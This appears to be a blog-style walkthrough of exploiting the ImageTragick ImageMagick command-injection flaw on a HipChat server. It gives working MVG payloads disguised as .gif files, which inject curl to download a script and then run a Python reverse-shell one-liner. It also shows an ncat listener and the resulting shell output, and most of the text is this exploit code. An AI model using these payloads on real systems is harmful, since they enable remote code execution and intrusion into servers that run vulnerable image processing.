It turns out the ImageTragick's PoC didn't work on our server:
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg";|ls "-la)' pop graphic-context
After quite a bit of mangling and testing, the following file contents, renamed to a .gif (HipChat doesn't accept .mvg files), will work:
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg";curl testserver:8000/test4")' pop graphic-context
I could see the request for "test4" in my testserver's logs. woot. This means we have remote command execution on the server. Now all we have to do is get shell.
Now since I didn't have time to figure out how to make it a leet one-liner, I decided to break shell access into two requests. The first pulls the shell script to /tmp/ and the second executes the file.
The reverse shell I used was:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I simply pasted that into a .sh on my testserver so the victim HipChat server could pull it down
I listened on my remote box with a basic ncat listener:
I listened on my remote box with a basic ncat listener:
ncat -l -v 1234
Then I created the two separate exploit .gif files. The first .gif runs curl to download the python shell:
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg";curl testserver:8000/python_shell.sh -o /tmp/python_shell.sh")' pop graphic-context
The second .gif executes the python shell:
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg";bash /tmp/python_shell.sh")' pop graphic-context
(now that I think about it, you might be able to combine both files into one to only have to upload once, but I haven't tested that)
Once you upload that second gif, about a second or two later, you should see your shell come through on your ncat 1234 port:
$ uname -a Linux hipchat.blah.com 3.4.0-54-generic #81~precise1-Ubuntu SMP Tue Jul 15 04:02:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)
So ImageTragick is kind of a big deal in that it's stupid easy to exploit (at least in this case) and it's a fairly reliable command injection vuln.